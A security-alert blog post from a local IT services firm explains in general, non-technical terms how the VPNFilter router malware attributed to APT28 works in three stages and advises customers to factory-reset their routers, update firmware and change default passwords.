Categories: Cybersecurity, Malware, Security Alert,

This is an alert for new malware that the Department of Justice has attributed to a group of threat actors called Sofacy (also known as APT28 and Fancy Bear), a hacking team backed by Russian intelligence. In computer security, "malware" is simply a shorthand term for malicious software. Common types of malware include viruses, trojans, spyware, worms, ransomware, bloatware, etc. Malware is any piece of software that was written with the intent of doing harm to data, devices, and people. Each type of malware has its own objectives and each one requires a different removal method.


In May, cyber threat intelligence team Cisco Talos reported hundreds of thousands of routers in as many as 54 countries around the world had been infected with new malware known as "VPNFilter." We now know that this malware targets even more devices than initial reports suggested. Vulnerable models include Linksys, MikroTik, Netgear, TP-Link, ASUS, D-Link, Huawei, Ubiquiti, UPVEL, ZTE networking equipment, as well as network-attached storage (NAS). The FBI advises all internet users to assume that their router has been infected and take action to remove their device’s infection vulnerabilities.

How Does VPNFilter Work?
Upon infecting a router, VPNFilter deploys in three stages. These stages make it possible for hackers to gather intelligence, steal information, and commit destructive or disruptive attacks.

Stage 1: The malware is constructed so that Stage 1 opens a backdoor to devices that can be infected and is then used to download additional payloads. This stage of the malware can survive a reboot and makes reinfection possible unless the router is patched with a firmware update.

Stage 2: VPNFilter deploys modules capable of command execution, data collection, and unauthorized data transfers. Additionally, stage 2 has a “self-destruct” feature that, once activated, will overwrite the device’s firmware and stop it from functioning. This can happen on almost every infected device.

Stage 3: A module with packet-sniffing capabilities is added to allow the hackers to intercept web traffic before it gets to you. Hackers can then can then manipulate everything going in and out of your device. They may change what you see, inject malicious content, or steal sensitive data as it is transmitted between your computer and a website. Usernames and passwords can be copied and sent to hackers by bypassing the encryption meant to keep you safe.

How Can VPNFilter Be Fixed?
VPNfilter is hard to prevent and patching routers isn't something average users can easily do on their own. Fortunately, the impact of VPNFilter can be mitigated.

Reset your router to factory defaults to clear the second and third stages of VPNFilter and contact our office for assistance in executing a firmware update that will clear the first stage of VPNFilter. Since your login credentials may already have been stolen, default passwords should also be changed.

Rebooting the device per the FBI’s recommendation may not be enough, however. Users can restart their routers to clear actively malicious packages, but they could just come back. The DOJ, FBI, and other agencies have vowed to intensify efforts in disrupting the threat and exposing the perpetrators. Ask a member of our team how to stay safe when accessing and browsing the web.

About the Author: Shenandoah Valley IT

Bio test